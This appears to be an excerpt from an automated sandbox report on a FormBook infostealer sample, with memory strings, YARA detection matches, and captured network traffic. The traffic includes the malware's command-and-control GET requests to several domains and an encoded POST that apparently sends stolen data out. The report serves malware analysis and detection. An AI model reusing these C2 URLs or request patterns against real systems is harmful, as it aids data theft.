        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:27 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 08 Aug 2022 14:11:30 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "616e0979-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: control.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf
        Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
        Source: control.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma/
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: vbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comtpuKK
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
        Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
        Source: unknownHTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
        Source: unknownDNS traffic detected: queries for: www.funwave.info
        Source: global trafficHTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1Host: www.funwave.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1Host: www.reprograme-se10x.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: vbc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
